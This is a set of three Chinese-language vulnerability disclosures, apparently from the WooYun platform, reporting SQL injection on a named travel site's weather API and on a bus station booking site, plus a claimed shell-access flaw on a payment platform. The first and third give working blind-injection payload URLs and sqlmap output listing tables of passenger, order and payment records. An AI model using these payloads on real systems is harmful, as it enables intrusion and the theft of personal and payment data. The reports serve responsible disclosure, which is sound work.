漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：驴妈妈主站某接口注入详细说明：注入点http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC&callback=jQuery172013711762335151434_1461556777871采用时间盲注的方法获取数据http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC%2527aND(1=if(length/**/(database/**/())=12,1,benchmark/**/(7000000,md5(1))))aND%25271%2527=%25271&callback=jQuery172013711762335151434_1461556777871延时大约2秒多漏洞证明： http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC%2527aND(1=if(ascii/**/(substr(database/**/()+from+1+for+1))>106,1,benchmark/**/(7000000,md5(1))))aND%25271%2527=%25271&callback=jQuery172013711762335151434_1461556777871最终获取当前数据库为 lmm_weather修复方案：过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-05 14:28厂商回复：thx最新状态：暂无

漏洞详情披露状态： 2016-04-26： 细节已通知厂商并且等待厂商处理中2016-04-26： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-04-27： 厂商已经主动忽略漏洞，细节向公众公开简要描述： 详细说明：付呗某运营平台漏洞可Getshell(泄露大量POS流水账单/支付信息/银行卡信息/商户/客户/产品信息).不知道是不是付呗的系统，，赌一把，，，如过不是就不要通过漏洞了,,,mask 区域1.http://**.**.**/app_pms/login/login.action    漏洞证明：(泄露大量POS流水账单/支付信息/银行卡信息/商户/客户/产品信息).      修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-04-27 09:58厂商回复：该系统非我公司所有，谢谢您的反馈最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：石家庄客运总站某站点SQL注入(含旅客身份证号\手机号\住址\订单时间去向)详细说明： code 区域**.**.**.**/Register.jsp检查用户是否存在code 区域GET **.**.**.**/CheckUserValue?userValue=test HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer: **.**.**.**/Register.jsp Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER) Host: **.**.**.** Connection: Keep-Alive Cookie: JSESSIONID=34130A0B9F153505167935FA37380FC3userValue参数存在注入盲注，直接上SQLMAP漏洞证明： code 区域Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 9336=9336 AND 'CUrZ'='CUrZ Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 5097=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(118)||CHR(85)||CHR(99),5) AND 'NaxB'='NaxB --- back-end DBMS: Oracle current schema (equivalent to database on Oracle): 'SJZWEB'code 区域Database: SJZWEB +-----------------------+---------+ | Table | Entries | +-----------------------+---------+ | TB_WEB_ERROR | 2980653 | | TB_WEB_USER_LOG | 610631 | | TB_WEB_LOG | 422999 | | TB_IMAGE_VALID | 72548 | | TB_WEB_ALIPAY | 69898 | | TB_WEB_SEAT_LOCK | 33135 | | TB_WEB_ORDER | 26011 | | TB_WEB_USER | 16203 | | TB_WEB_USER_ONLINE | 13147 | | TB_WEB_MSG_SEND | 2033 | | TB_WEB_ORDER_BUILD | 1191 | | TB_CITY | 363 | | TB_NEW_SCHEDULE | 172 | | TB_WEB_TICKETSALE_UPD | 125 | | TB_WEB_ALL_ROUTE | 101 | | TB_PROVINCE | 34 | | TB_WEB_PARAMETER | 13 | | TB_WEB_AD | 8 | | TB_WEB_NEW_SCHEDULE | 8 | | TB_ANSWER_QUESTION | 6 | | TB_GATEWAY | 1 | | TB_WEB_DISCOUNT | 1 | | TB_WEB_SALE_SCHEDULE | 1 | | TB_WEB_SEATPASSWORD | 1 | +-----------------------+---------+用户登陆日志包含用户ip，session用户订单界面，涵盖用户的支付宝订单号，出发地，登陆ip，付款金额，目的地站点名称等详细信息修复方案：过滤敏感字符版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-04-29 10:18厂商回复：CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给河北分中心，由河北分中心后续协调网站管理单位处置。最新状态：暂无